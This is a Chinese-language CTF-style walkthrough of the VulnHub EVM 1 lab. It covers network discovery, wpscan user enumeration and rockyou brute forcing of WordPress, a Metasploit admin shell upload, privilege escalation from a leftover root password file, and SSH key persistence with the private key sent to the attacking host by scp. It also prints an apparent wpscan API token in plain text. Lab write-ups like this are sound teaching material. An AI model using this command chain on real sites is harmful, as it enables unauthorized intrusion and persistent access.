靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/
教程链接地址:https://blog.csdn.net/liver100day/article/details/119276797

# 确认攻击目标

攻击机 KALI:192.168.31.135
靶机 EVM:桥接于 192.168.31.1 的网卡,ip 未知

  1. 通过 netdiscover 扫描当前网卡里边有哪些机器
    sudo netdiscover -i eth0 -r 192.168.31.0/24

  1. 将所有已知的 ip 暂时存档,对这类 ip 地址不做端口扫描
1
2
3
4
# shell
cat > myip.txt << EOF
192.168.31.1 192.168.31.25 192.168.31.135
EOF

3)去除一些已知 ip 的机器,对剩余 IP 进行端口扫描,判断目标 IP
sudo nmap -PA 192.168.31.0/24 --excludefile myip.txt

Image

-> 目标机器的 ip 地址: 192.168.31.155

# 端口扫描

sudo nmap -A - p 1-1024 192.168.31. 155 - oN /tmp/evm.txt

# wordpress 渗透

打开网站:http://192.168.31.155

  1. 观察页面可知存在网址 http://192.168.31.155/wordpress/

  2. 对此网站进行目录扫描
    dirsearch -u [http://192.168.31.155](http://192.168.31.155)

Image

http://192.168.31.155/wordpress/
http://192.168.31.155/wordpress/wp-login.php
-> 对 wordpress 网站渗透扫描

  1. 获取到 wpscan 的 api token:https://wpscan.com/profile?pricingList=1
1
2
3
# 通过以下命令枚举wordpress的用户名:
wpscan --url http://192.168.31.155/wordpress/ --enumerate u --api-token
eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc
Image
1
2
3
# 通过以下命令爆破wordpress用户名c0rrupt3d_brain的密码:
wpscan --url [http://192.168.](http://192.168.) 31 .1 55 /wordpress/ - U c0rrupt3d_brain -P
/usr/share/wordlists/rockyou.txt
Image

-> 成功得到 wordpress 网站的用户名:c0rrupt3d_brain ,密码: 24992499

# msf 攻击 wordpress

1) 得到账号密码,可以登入后台写入反弹 shell 到任意模板 getshell,
也可以使用 msf 自带 exploit/unix/webapp/ 下的模块进行利用,因为 msf 方便,这里我选择后者

1
2
3
4
5
6
7
8
# 使用msf自带exploit/unix/webapp/下的模块进行利用
msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set password 24992499
set rhosts 192.168.31.155
set username c0rrupt3d_brain
set targeturi /wordpress
run

  1. 获取到标准的 shell
1
2
3
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo;
Image

可以通过 nc 监听,将 shell 从 msf 反弹至一个普通的 terminal
-> 成功得到一个 www-data 网站用户的 shell

# 历史遗留文件提权

查看是否有隐藏文件,判断出哪个文件可能是遗留密码
这里很明显.root_password_ssh.txt 是 root 密码
通过 su root 登陆到了 root 账户
Image

-> 成功得到 root 管理员的 shell

# 密钥对权限维持

  1. 服务端写 ssh 公钥,并将私钥文件发送至攻击机
1
2
3
4
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
scp ~/.ssh/id_rsa parallels@192.168.31.135:~/.ssh/vulnhub_evm
rm -f ~/.ssh/id_rsa*

  1. 攻击机保存私钥修改权限,并尝试连接靶机
1
2
chmod 700 vulnhub_evm
ssh root@192.168.31.155 -i ~/.ssh/vulnhub_evm
Image -> 渗透结束
更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝